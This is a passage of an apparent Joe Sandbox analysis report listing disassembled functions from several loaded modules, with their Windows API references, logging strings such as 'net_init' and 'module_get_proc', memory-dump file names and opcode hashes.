Opcode ID: c90fb732901bfcef3479976ecb70827c67309f286ee6606b0b5eb548d882ae44
Instruction ID: 0c3c2253575d6301e7106cbe7b32b3d72bf65f32a0e624ccad0567b6f643fe6f
Opcode Fuzzy Hash: c90fb732901bfcef3479976ecb70827c67309f286ee6606b0b5eb548d882ae44
Instruction Fuzzy Hash: 6DF090A0B0AC43D1FB129B57E8447F8271BAF503A4F8454B6C80E4A1BAEF1CE549C300

Function 00007FFE13301FCE Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE13301FE0

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE13302034
[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFE1330201F
net_init, xrefs: 00007FFE13301FF1, 00007FFE13302015
[I] (%s) -> %s, xrefs: 00007FFE13301FF8
Done, xrefs: 00007FFE13301FEA

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: c4eed24462b8fa7fecf60d03d9b0faac7885e2a2389ba4c12e41e7cca7c8d377
Instruction ID: ffc3f69b6aec50ffb1ffa522c446aeca5272f00a99b3efc3ba28326d8b4a1765
Opcode Fuzzy Hash: c4eed24462b8fa7fecf60d03d9b0faac7885e2a2389ba4c12e41e7cca7c8d377
Instruction Fuzzy Hash: 59F090A2B08D07D9FB109B12E8457F85350AF347A0F8400B2E83D662B7EE1DE549D708

Function 00007FFE0EB4595E Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE0EB45970

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

Strings

Done, xrefs: 00007FFE0EB4597A
net_init, xrefs: 00007FFE0EB45981, 00007FFE0EB459A5
[I] (%s) -> %s, xrefs: 00007FFE0EB45988
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EB459C4
[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFE0EB459AF

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: b0e823c6e930fdcfab4c5bd324a1594f4958c7afa287811d57dcb3535c712e05
Instruction ID: 48f034637672fb6a1669f4886f288e988f552bf5d4b7ef60340667aab2f9bb19
Opcode Fuzzy Hash: b0e823c6e930fdcfab4c5bd324a1594f4958c7afa287811d57dcb3535c712e05
Instruction Fuzzy Hash: CFF01DA1F1A94792FB359F18E8063F52361EF54784F44443AD98D866B6EE1CE5498F00

Function 00007FFE0EBD2DDE Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE0EBD2DF0

Part of subcall function 00007FFE0EBD1292: fwrite.MSVCRT ref: 00007FFE0EBD133E
Part of subcall function 00007FFE0EBD1292: fflush.MSVCRT ref: 00007FFE0EBD134A

Strings

[I] (%s) -> %s, xrefs: 00007FFE0EBD2E08
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EBD2E44
Done, xrefs: 00007FFE0EBD2DFA
[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFE0EBD2E2F
net_init, xrefs: 00007FFE0EBD2E01, 00007FFE0EBD2E25

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: 004d0ef3957c76c15733a8feaf0c6f1d0a4dbcf718e70593778612304d9c5a7c
Instruction ID: 813bfe516f9d47ecb999925ea760e978530c78e5624d6b441650c672d060f070
Opcode Fuzzy Hash: 004d0ef3957c76c15733a8feaf0c6f1d0a4dbcf718e70593778612304d9c5a7c
Instruction Fuzzy Hash: AEF01D61B4D44692FB319F18F8443F523A0AF24784F844436D8CD472BAFE5DE6498F10

Function 00007FFE0EC02F1E Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE0EC02F30

Part of subcall function 00007FFE0EC02FD2: fwrite.MSVCRT ref: 00007FFE0EC0307E
Part of subcall function 00007FFE0EC02FD2: fflush.MSVCRT ref: 00007FFE0EC0308A

Strings

Done, xrefs: 00007FFE0EC02F3A
[I] (%s) -> %s, xrefs: 00007FFE0EC02F48
[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFE0EC02F6F
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EC02F84
net_init, xrefs: 00007FFE0EC02F41, 00007FFE0EC02F65

Memory Dump Source

Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true

Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: b8168152bed2fe7015a620b0f98054066fbf806d0659ad2a0f81c7eb32b1367f
Instruction ID: 85f77d2be975b3e816289577f64e9b4e4d5e56029ebd34aeaf7d277b3652f711
Opcode Fuzzy Hash: b8168152bed2fe7015a620b0f98054066fbf806d0659ad2a0f81c7eb32b1367f
Instruction Fuzzy Hash: D3F01D64B0859BB2FB189B64E8C87F42215AF223C4F440072D8CE462B7EE1EE5999342

Function 00007FFE0E162DDE Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE0E162DF0

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

Strings

net_init, xrefs: 00007FFE0E162E01, 00007FFE0E162E25
[I] (%s) -> %s, xrefs: 00007FFE0E162E08
[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFE0E162E2F
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E162E44
Done, xrefs: 00007FFE0E162DFA

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: 5124ac14fcf3d2f0fb5204d63161834fb47c8434f70f0caa57941e07c2c0f691
Instruction ID: 350c13c57bc2e2fdcf8d1dacd5220ec29b3317bf62508ff1e0cdfbf23a47f2db
Opcode Fuzzy Hash: 5124ac14fcf3d2f0fb5204d63161834fb47c8434f70f0caa57941e07c2c0f691
Instruction Fuzzy Hash: 43F030A1B0D40791FB119B25E8443F523616F54BD5F544837D8ED461B6EE6DE548C700

Function 00007FFE11503AFD Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 127sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00007FFE11503B30
Sleep.KERNEL32 ref: 00007FFE11503BAC

Strings

/, xrefs: 00007FFE11503C8F
routine_rx, xrefs: 00007FFE11503C28, 00007FFE11503C5A
[W] (%s) -> Not a valid packet received(size=%u,suid=%llx), xrefs: 00007FFE11503C61
[W] (%s) -> Not a valid event received(size=%u,suid=%llx,packed_event_sz=%u,event_sz=%u), xrefs: 00007FFE11503C2F

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Sleep
String ID: /$[W] (%s) -> Not a valid event received(size=%u,suid=%llx,packed_event_sz=%u,event_sz=%u)$[W] (%s) -> Not a valid packet received(size=%u,suid=%llx)$routine_rx
API String ID: 3472027048-1600310168
Opcode ID: 95fe71e78bf61cfc0f47fa0742824d03069bead29b5896cf44766b2ee98907d1
Instruction ID: 70378c1bd8b9ea470815cf204b8f55a4bcff2310c29e5b8a53800d7ed011997c
Opcode Fuzzy Hash: 95fe71e78bf61cfc0f47fa0742824d03069bead29b5896cf44766b2ee98907d1
Instruction Fuzzy Hash: FB517221E0CD4349FBB09B97E4843BE635AAF45378F5442B9D46D466F6DE2CE4458700

Function 00007FF6BFD6836F Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BFD61360: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF6BFD684AF), ref: 00007FF6BFD6137E

_mbscpy.MSVCRT ref: 00007FF6BFD683DC

Part of subcall function 00007FF6BFD6824D: strlen.MSVCRT ref: 00007FF6BFD68258
Part of subcall function 00007FF6BFD6824D: strlen.MSVCRT ref: 00007FF6BFD68274
Part of subcall function 00007FF6BFD6824D: strlen.MSVCRT ref: 00007FF6BFD68280

Strings

[I] (%s) -> Done(pkg_path=%s,tgt_path=%s), xrefs: 00007FF6BFD68485
package_install, xrefs: 00007FF6BFD6840E, 00007FF6BFD6847E
service, xrefs: 00007FF6BFD68370
[E] (%s) -> Failed(pkg_path=%s,tgt_path=%s,err=%08x), xrefs: 00007FF6BFD68415

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: strlen$HandleModule_mbscpy
String ID: [E] (%s) -> Failed(pkg_path=%s,tgt_path=%s,err=%08x)$[I] (%s) -> Done(pkg_path=%s,tgt_path=%s)$package_install$service
API String ID: 3656010895-1379287937
Opcode ID: 4b1288cd24698f13a6b3948ac59b53d7aab4a4e5bdf7d96b3b3cf1ccf810a908
Instruction ID: 607bdfb7dd5c785f2b7c71906b85dd0831a9079e0b498f30811d09ee8241f5fd
Opcode Fuzzy Hash: 4b1288cd24698f13a6b3948ac59b53d7aab4a4e5bdf7d96b3b3cf1ccf810a908
Instruction Fuzzy Hash: BD312F6270C687A1EB109AD8E8913EA6351EF84344F940232E74DCB6A9DE6DE909C780

Function 00007FFE11504423 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFE11504443

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

GetLastError.KERNEL32 ref: 00007FFE11504476

Strings

module_get_proc, xrefs: 00007FFE1150445C, 00007FFE11504486
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFE1150448D
[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFE11504463

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 48ce536a705db6c97793462121a9863f2cb2c58c6fa9189182f0ebf2a6c3c87d
Instruction ID: 7ecd3e72a94acbc7223eb8859877353e7314cc4e3950089d1a8badbec20f2d2d
Opcode Fuzzy Hash: 48ce536a705db6c97793462121a9863f2cb2c58c6fa9189182f0ebf2a6c3c87d
Instruction Fuzzy Hash: 8FF0F490B1AE0391FB128787B8401B9635A6F04BF4F0884B5DC4D0B7B8EF2CE5428300

Function 00007FFE133073F3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFE13307413

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

GetLastError.KERNEL32 ref: 00007FFE13307446

Strings

[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFE13307433
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFE1330745D
module_get_proc, xrefs: 00007FFE1330742C, 00007FFE13307456

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: dd9404e3db5c0461c18871f2139751ef61263b9fda9ef578b80a53aa00013c8c
Instruction ID: 91df6ec028aecff7670a269ac3d2fd45cd3875f481ea418321332b8154cb4b5a
Opcode Fuzzy Hash: dd9404e3db5c0461c18871f2139751ef61263b9fda9ef578b80a53aa00013c8c
Instruction Fuzzy Hash: 2FF0F950A08F17DAFA115747F8005B956156F24BF0F044171CD7C2777AEE2CE5478308

Function 00007FFE0EB41A23 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFE0EB41A43

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

GetLastError.KERNEL32 ref: 00007FFE0EB41A76

Strings

[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFE0EB41A8D
module_get_proc, xrefs: 00007FFE0EB41A5C, 00007FFE0EB41A86
[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFE0EB41A63

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 204197e28d0218e5bb9a1a286745401afee39e57a0e3aa4e79a336b4d32a1a88
Instruction ID: b6ca3425774f9f4edb75aa4240e7ca6d9b1a92dbeb84f8df90d30d0f2c7afb2d
Opcode Fuzzy Hash: 204197e28d0218e5bb9a1a286745401afee39e57a0e3aa4e79a336b4d32a1a88
Instruction Fuzzy Hash: 67F0A4D1F1A74752FA719F49A8006B563A1AF44BD0F488131DDDD4B7B8EF2CE6868B00

Function 00007FFE0EBD9F73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFE0EBD9F93

Part of subcall function 00007FFE0EBD1292: fwrite.MSVCRT ref: 00007FFE0EBD133E
Part of subcall function 00007FFE0EBD1292: fflush.MSVCRT ref: 00007FFE0EBD134A

GetLastError.KERNEL32 ref: 00007FFE0EBD9FC6

Strings

[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFE0EBD9FB3
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFE0EBD9FDD
module_get_proc, xrefs: 00007FFE0EBD9FAC, 00007FFE0EBD9FD6

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 6f3c1551105c8dfc7e1f15e3bb900e5261b2279416a7051120b2652ae59b7495
Instruction ID: dff92c6a17fbf2ba8b015acff4071dc511cdb21c8a4c99d457617551d992eeb4
Opcode Fuzzy Hash: 6f3c1551105c8dfc7e1f15e3bb900e5261b2279416a7051120b2652ae59b7495
Instruction Fuzzy Hash: F2F08150B0D61752FA215F5AA8005F56351AF88BC0F048132DDCD0B7B8FE2CE546CB00

Function 00007FFE0EC020F3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFE0EC02113

Part of subcall function 00007FFE0EC02FD2: fwrite.MSVCRT ref: 00007FFE0EC0307E
Part of subcall function 00007FFE0EC02FD2: fflush.MSVCRT ref: 00007FFE0EC0308A

GetLastError.KERNEL32 ref: 00007FFE0EC02146

Strings

[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFE0EC02133
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFE0EC0215D
module_get_proc, xrefs: 00007FFE0EC0212C, 00007FFE0EC02156

Memory Dump Source

Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true

Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 27f23b630b3fee3274bf3a028bcd2db1b972005ed87ce814cecee143b722bf30
Instruction ID: d29deca759750f9df2f07bd81d687cb7b72cf08c26549e4d24303e4eb548bd00
Opcode Fuzzy Hash: 27f23b630b3fee3274bf3a028bcd2db1b972005ed87ce814cecee143b722bf30
Instruction Fuzzy Hash: 07F0D190A0869762FA094B85F8841B952116F06BD0F484131DDCD0B7BAEE2EE9828303

Function 00007FFE0E16CF13 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFE0E16CF33

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

GetLastError.KERNEL32 ref: 00007FFE0E16CF66

Strings

[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFE0E16CF7D
module_get_proc, xrefs: 00007FFE0E16CF4C, 00007FFE0E16CF76
[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFE0E16CF53

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: c197a9657db9c7da096505ab386be7bd724489283de748c128f0a002c1b1a445
Instruction ID: 3022929cc10eee8fff162a51c0703f62061bd30e82b1bd1b3675752226b42656
Opcode Fuzzy Hash: c197a9657db9c7da096505ab386be7bd724489283de748c128f0a002c1b1a445
Instruction Fuzzy Hash: 9EF0A990B0A65751FA514756E9001F9A321AF48FC0F554533ECDD4B779EF2CDA4A8300

Function 00007FF6BFD61613 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,00000000,0000013B444313D0,?,00007FF6BFD6941F), ref: 00007FF6BFD61633

